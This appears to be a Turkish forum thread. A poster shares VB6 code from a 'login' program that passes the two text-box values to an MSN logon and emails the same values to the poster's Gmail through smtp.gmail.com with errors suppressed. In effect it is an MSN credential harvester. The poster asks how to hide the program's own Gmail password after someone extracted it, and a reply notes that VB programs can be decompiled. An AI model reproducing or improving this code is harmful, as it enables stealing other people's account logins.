arkdaşlar vb6dan yaptığım programda login sistem yaptım oradaki şifreyi şahısın biri buluyor bide 2 adet text koydum gmailime yollanıyo oraya yazılanlar gmailimin şifresinide buluyor programını şifrelemelisin diyor nasıl yapabilirim?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
On Error Resume Next[/COLOR] [COLOR=Lime]
msn.Logon Text1.Text, Text2.Text, msn.Services.PrimaryService
On Error Resume Next[/COLOR] [COLOR=Lime]
Dim iMsg, iConf, Flds[/COLOR] [COLOR=Lime]
Set iMsg = CreateObject("CDO.Message")[/COLOR] [COLOR=Lime]
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = "http://schemas.microsoft.com/cdo/configuration/"[/COLOR] [COLOR=Lime]
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = "senin gmail"
Flds.Item(schema & "sendpassword") = "senin şifre"
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg[/COLOR] [COLOR=Lime]
.To = "tekrar gmail"
.From = "kimden"
.Subject = "baslk"
.HTMLbOdy = Text1.Text & Text2.Text
.Organization = "Mail Organtion"
.ReplyTo = "-"
Set .Configuration = iConf
SendEmailGmail = .Send
lbl.Caption = lbl.Caption + 1
End With
bazı programlar vb ile yazılmış programın kod içeriğini gösteriyor. bu şekilde msn adresiniz ve şifresi kullandığınz kodlar açığa çıkabiliyor.